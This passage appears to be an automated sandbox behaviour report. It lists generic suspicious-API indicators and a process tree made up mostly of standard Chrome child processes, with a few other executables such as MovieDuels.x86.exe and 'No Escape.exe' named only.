pid Process 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe Token: SeShutdownPrivilege 5072 chrome.exe Token: SeCreatePagefilePrivilege 5072 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 744 wmplayer.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 3476 msiexec.exe 3476 msiexec.exe 5680 msiexec.exe 5680 msiexec.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 5072 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe 2708 chrome.exe -
Suspicious use of SetWindowsHookEx 50 IoCs
pid Process 3948 MiniSearchHost.exe 2296 OpenWith.exe 2296 OpenWith.exe 2296 OpenWith.exe 2296 OpenWith.exe 2296 OpenWith.exe 2296 OpenWith.exe 2296 OpenWith.exe 2296 OpenWith.exe 2296 OpenWith.exe 2296 OpenWith.exe 2296 OpenWith.exe 2296 OpenWith.exe 2296 OpenWith.exe 2296 OpenWith.exe 2296 OpenWith.exe 2296 OpenWith.exe 2296 OpenWith.exe 2296 OpenWith.exe 2296 OpenWith.exe 5752 OpenWith.exe 5752 OpenWith.exe 5752 OpenWith.exe 5752 OpenWith.exe 5752 OpenWith.exe 5752 OpenWith.exe 5752 OpenWith.exe 5752 OpenWith.exe 5752 OpenWith.exe 5752 OpenWith.exe 5752 OpenWith.exe 5752 OpenWith.exe 5752 OpenWith.exe 2176 Winword.exe 2176 Winword.exe 2176 Winword.exe 2176 Winword.exe 2176 Winword.exe 2176 Winword.exe 2176 Winword.exe 2176 Winword.exe 2176 Winword.exe 2356 Winword.exe 2356 Winword.exe 2356 Winword.exe 2356 Winword.exe 2356 Winword.exe 2356 Winword.exe 4952 No Escape.exe 4456 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5072 wrote to memory of 4940 5072 chrome.exe 85 PID 5072 wrote to memory of 4940 5072 chrome.exe 85 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 3332 5072 chrome.exe 86 PID 5072 wrote to memory of 1176 5072 chrome.exe 87 PID 5072 wrote to memory of 1176 5072 chrome.exe 87 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 PID 5072 wrote to memory of 404 5072 chrome.exe 88 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 488 attrib.exe 1656 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MovieDuels.x86.exe"C:\Users\Admin\AppData\Local\Temp\MovieDuels.x86.exe"1⤵
- System Location Discovery: System Language Discovery
PID:232
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3948
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xe0,0x108,0x7ffd2f4bdcf8,0x7ffd2f4bdd04,0x7ffd2f4bdd102⤵PID:4940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1908,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1900 /prefetch:22⤵PID:3332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1480,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2224 /prefetch:112⤵PID:1176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2360,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2372 /prefetch:132⤵PID:404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3372 /prefetch:12⤵PID:5080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3276,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3456 /prefetch:12⤵PID:4972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4088,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3204 /prefetch:92⤵PID:3020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4656,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4676 /prefetch:12⤵PID:5444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4836,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4840 /prefetch:142⤵PID:5408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4708,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4872 /prefetch:142⤵PID:5308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4516,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5424 /prefetch:142⤵PID:2436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5476,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4924 /prefetch:142⤵PID:3724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5596,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5456 /prefetch:142⤵PID:5960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5364,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5444 /prefetch:142⤵PID:2132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5432,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5440 /prefetch:142⤵PID:2044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5804,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5520 /prefetch:142⤵PID:3156
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5868,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6116 /prefetch:142⤵PID:2040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5896,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5920 /prefetch:142⤵PID:5852
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5836,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6084 /prefetch:142⤵PID:5556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=6136,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4288 /prefetch:92⤵PID:5992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=4260,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=872 /prefetch:12⤵PID:4540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=5880,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4292 /prefetch:102⤵
- Suspicious behavior: EnumeratesProcesses
PID:4884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=3640,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4336 /prefetch:12⤵PID:2480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5696,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5984 /prefetch:142⤵
- NTFS ADS
PID:5104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3532,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4584 /prefetch:142⤵PID:4180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=4832,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6028 /prefetch:12⤵PID:5308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3712,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3504 /prefetch:142⤵PID:2896
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=6176,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6188 /prefetch:12⤵PID:2108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6340,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6344 /prefetch:142⤵PID:5252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=6332,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5900 /prefetch:12⤵PID:2164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=6116,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6028 /prefetch:12⤵PID:3312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=3492,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5680 /prefetch:12⤵PID:6100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=6076,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6324 /prefetch:12⤵PID:5348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=6536,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6520 /prefetch:12⤵PID:5184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=6668,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6708 /prefetch:12⤵PID:3952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=3512,i,3860347788954719087,1925155907477875263,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=6840 /prefetch:12⤵PID:5888
-
-
